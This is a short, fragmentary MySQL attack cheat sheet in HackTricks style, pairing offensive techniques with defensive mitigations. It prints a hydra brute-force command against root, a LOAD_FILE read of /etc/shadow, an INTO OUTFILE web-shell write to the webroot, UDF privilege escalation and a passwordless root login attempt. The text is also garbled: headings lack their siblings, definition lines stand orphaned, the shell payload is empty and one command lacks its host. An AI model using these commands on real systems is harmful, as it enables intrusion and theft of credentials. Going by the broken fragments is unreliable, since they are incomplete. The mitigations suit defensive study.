MySQL HackTricks Verified Jun 2026

SELECT @@plugin_dir;

For network-level testing, researchers verify remote access to port 3306 using tools like nmap or mysql client commands (mysql -h -u root) before attempting brute-force attacks.

Common Exploitation Paths (Verified on HackTricks)

SELECT '' INTO OUTFILE '/var/www/html/shell.php'; to achieve Remote Code Execution (RCE).

B. Privilege Escalation via UDF

| Attack Vector | Verified HackTricks Technique | Defensive Mitigation |
|---------------|-------------------------------|----------------------|
| Credential brute-force | hydra -l root -P wordlist.txt mysql://target | Enforce account lockout, use strong passwords, restrict network access to 3306 |
| UDF privilege escalation | Uploading udf.so to plugin directory | Set secure_file_priv = NULL (disables import and export) or a specific safe directory, never the empty string, which removes the restriction; run MySQL as non-root user |
| File read via LOAD_FILE | SELECT LOAD_FILE('/etc/shadow') | Disable FILE privilege unless absolutely necessary; use SELinux/AppArmor |
| Writing web shell | INTO OUTFILE to webroot | Set secure_file_priv to a directory not accessible by the web server; use prepared statements against SQLi |

: Controls the IP address that listens for administrative TCP/IP connections.

mysql -u root -h target.com --skip-password

: Attempt to connect locally or remotely, often using brute force if credentials are unknown.